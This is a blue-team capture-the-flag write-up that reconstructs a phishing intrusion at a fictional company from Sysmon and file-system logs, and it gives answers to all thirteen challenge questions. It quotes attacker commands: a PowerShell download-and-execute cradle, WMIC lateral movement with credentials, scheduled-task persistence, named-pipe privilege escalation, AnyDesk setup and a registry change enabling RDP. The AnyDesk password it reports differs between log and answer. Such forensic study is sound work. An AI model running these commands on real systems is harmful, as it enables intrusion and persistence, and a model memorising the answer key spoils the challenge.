Zerologon
π Published: 2026-04-20 17:57 | π Last Updated: 2026-05-13 17:28
https://cyberdefenders.org/blueteam-ctf-challenges/zerologon/

Contextβ
Your role as a Tier 2 SOC Analyst at EliteSystems Corp is put to the test following an alert from the Tier 1 team about a confirmed phishing email leading to a potential network wide intrusion. With disk data already triaged and ready for analysis, you must uncover the extent of this intrusion and identify the compromised assets within the network.
Basic triageβ
I checked the event ID 1 on the system:
2024-01-02 19:44:02.245
User: ELITESYSTEMS\esmith
ParentImage: C:\Users\esmith\AppData\Local\Temp\easygoing.exe
CommandLine C:\Windows\system32\rundll32.exe
cmd.exe /C netstat -anop tcp
cmd.exe /C nslookup DC01
cmd.exe /C nslookup FIN-PC
cmd.exe /C nslookup FileServer
cmd.exe /C nslookup IT-PC
Get-ADComputer -Filter * -Properties * | Export-CSV "C:\Users\esmith\Appdata\Local\Temp\ADComputers.csv" -NoTypeInformation
C:\Windows\system32\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll
C:\Windows\system32\cmd.exe /C dir /s *file/ Microsoft.ActiveDirectory.Management.dll
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:25816/'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\Users\esmith\Appdata\Local\Temp\found_shares.txt
2024-01-02 20:44:
ParentImage C:\Windows\System32\rundll32.exe
C:\Windows\system32\cmd.exe /c echo ddb867670d7 > \.\pipe\308808
C:\Windows\system32\cmd.exe /C wmic /node:192.168.202.126 /user:FileShareService /password:MYpassword123# logicaldisk get caption,description,drivetype,providername,volumename β lateral movement to fileshare
C:\Windows\system32\cmd.exe /C wmic logicaldisk get caption,description,drivetype,providername,volumename
2024-01-02 21:35:06.488
C:\Windows\system32\cmd.exe /C schtasks /create /tn "ChromeUpdater" /tr "powershell -File 'C:\Users\esmith\AppData\Local\ChromeUpdater\ChromeUpdate.ps1'" /sc onlogon /ru System
2024-01-02 21:59:32.444
powershell -nop -exec bypass -EncodedCommand .\localdisk.ps1
Initial triage of the victim's environment revealed a phishing email sent to esmith@elitesystemscorp.xyz containing a malicious attachment named documents.zip.
Forensic analysis of the Master File Table ($MFT) using MFTECmd.exe and system event logs provided the timeline of execution. The parent image C:\Users\esmith\AppData\Local\Temp\easygoing.exe was observed spawning multiple suspicious child processes, including network discovery (netstat, nslookup), Active Directory enumeration, and lateral movement attempts via Windows Management Instrumentation Command-line (WMIC) and the execution of malicious of Powershell script.
Questionsβ
Q1 Analyzing the attack chain requires identifying the file that initiated the payload execution. Which shortcut file was generated after executing the payload-containing file extracted from the ZIP archive?β
When a user opens a file in Windows, a corresponding LNK (shortcut) file is automatically generated by the operating system. By parsing the $MFT using MFTECmd.exe and analyzing the creation timestamps, we correlated the execution of the ZIP file to its artifact.
.\MFTECmd.exe -f 'C:\Users\Administrator\Desktop\Start Here\Artifacts\FIN-PC\$MFT' --csv "C:\Users\Administrator\Desktop" --csvf "mft.csvβ.
C:\Users\esmith\Downloads\documents.zip
documents.lnk (Created: 2024-01-01 20:00:24).
Q2 Itβs essential to gather as much information as possible about the attack. Can you identify the malicious script inside the ZIP Archive?β
Further review of the $MFT extraction surrounding the documents.zip directory path revealed the specific payloads extracted by the user.
Since the question ask for the script. The answer must be:
eyewear.bat
Q3 By identifying the C2 IP address, we can gather clues about the attacker, such as their possible location, identity, or affiliation, and understand their motives. Can you identify the C2 IP address?β
Using event ID 3 associated with the execution of the payload:
2024-01-02 08:28:46.122
C:\Users\esmith\AppData\Local\Temp\easygoing.exe
192.168.202.197 42.63.200.142
port 80
42.63.200.142
Q4 A key step in an attacker's strategy is reconnaissance. What command was used to gather and export data about the domain's computers?β
As we already found out the corresponding command in basic triage:
Get-ADComputer -Filter * -Properties * | Export-CSV "C:\Users\esmith\Appdata\Local\Temp\ADComputers.csv" -NoTypeInformation
The attacker utilized a built-in PowerShell Active Directory cmdlet to perform extensive network reconnaissance.
The -Filter * parameter was used to query the Domain Controller for all computer objects without exception.
The -Properties * parameter forced the Domain Controller to return all hidden and extended attributes for each machine (which can leak sensitive data such as OS versions, exact IPs, and administrator descriptions).
Q5 With escalated privileges, an attacker can typically do more damage. What command did the attacker use to attempt privilege escalation?β
From the basic triage:
2024-01-02 20:44:
ParentImage C:\Windows\System32\rundll32.exe
C:\Windows\system32\cmd.exe /c echo ddb867670d7 > \.\pipe\308808
The attacker abused Named Pipe Impersonation to elevate privileges.
- By utilizing their current permissions (likely a service account holding
SeImpersonatePrivilege- which often associated with web server, database accounts), the malware created a named pipe (308808). - It then forced a highly privileged process (
SYSTEM) to interact with this pipe via theechocommand. This allowed the malware to call theImpersonateNamedPipeClient()API and steal theSYSTEMAccess Token.
echo ddb867670d7 > \.\pipe\308808
Q6 We need to assess the severity of the breach. Was the attacker able to compromise any user account? Can you provide the password of the user account the attacker compromised?β
We also figured out in the basic triage session:
C:\Windows\system32\cmd.exe /C wmic /node:192.168.202.126 /user:FileShareService /password:MYpassword123# logicaldisk get
The Windows Management Instrumentation Command-line (WMIC) is a deprecated tool providing a command-line interface for WMI to manage Windows components, hardware, and software. It is is heavily abused for lateral movement by executing commands or binaries on remote hosts using valid credentials
MYpassword123#
Q7 To ensure complete eradication, identifying and removing persistence mechanisms is essential to ensure the attacker can no longer access the compromised system. What's the command used by the attacker to achieve persistence?β
Same as previous questions, already found out in triage:
2024-01-02 21:35:06.488
schtasks /create /tn "ChromeUpdater" /tr "powershell -File 'C:\Users\esmith\AppData\Local\ChromeUpdater\ChromeUpdate.ps1'" /sc onlogon /ru System
Q8 Identifying the targeted data for exfiltration allows the organization to understand the potential impact of the breach and the data's confidentiality level. What's the full path of the folder whose data was targeted by the PowerShell script?β
Analysis of the UsnJrnl indicated that after attacker executed the localdisk.ps1, a new folder named C:\data was generated.

The journal showed that ZIP archives (e.g., administrator.zip, esmith.zip) were being created inside this folder, packaging data directly from the user directories.

So the answer must be:
C:\users
Q9 To understand the spread of the intrusion and discover possible lateral movement attempts. What is the name of the malicious service installed remotely on FileServer?β
Reviewing the Event ID 11 on FileServer revealed a suspicious, randomly generated service name:
075b12b
Q10 Credential dumping can significantly expand the breach's impact, giving attackers access to numerous systems and data. Can you identify the process name that dumped credentials?β
The attacker utilized a built-in Windows executable to dump credentials from memory (likely interacting with LSASS), bypassing standard execution restrictions via Living-off-the-Land (LotL) techniques.
By using the event ID 10 on the FileServer
rundll32.exe
Q11 Attackers usually install software on a target system to maintain long-term access, move laterally, access other systems, and expand their reach. What remote access software did the attacker install on one of the machines?β
I checked in the sysmon event ID 1 logs:

FileServer.elitesystems.local 2024-01-02 21:21:42 C:\Windows\system32\cmd.exe /C echo Qwerty123!@#! | AnyDesk.exe --set-password
AnyDesk
Q12 What password did the attacker set for the installed software?β
Qwerty123!@#_!
Q13 Attackers often enable RDP for more control. What command was used by the attacker to enable RDP?β
To enable RDP attacker has to change the fDenyTSConnections value to 0
I navigated to sysmon Event ID 1 on DC01 and filtered for the key:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
The kill chainβ
The network intrusion began with a successful phishing attack delivering a malicious ZIP archive (documents.zip). Upon user interaction, the payload (easygoing.exe) was executed, establishing a Command & Control (C2) connection with 42.63.200.142.
The threat actor moved swiftly through the cyber kill chain:
- Reconnaissance: Enumerated the entire Active Directory structure using PowerShell.
- Privilege Escalation: Successfully acquired
SYSTEMrights via Named Pipe Impersonation. - Lateral Movement: Used compromised credentials (
FileShareService/MYpassword123#) to pivot to the FileServer via WMIC. - Collection & Exfiltration: Scripted the automated compression of user profiles located in
C:\Usersinto a staging directory (C:\data). - Persistence: Established multiple backdoors, including a disguised Scheduled Task ("ChromeUpdater"), an unauthorized AnyDesk installation, and the manual enablement of Remote Desktop Protocol (RDP) via Registry manipulation.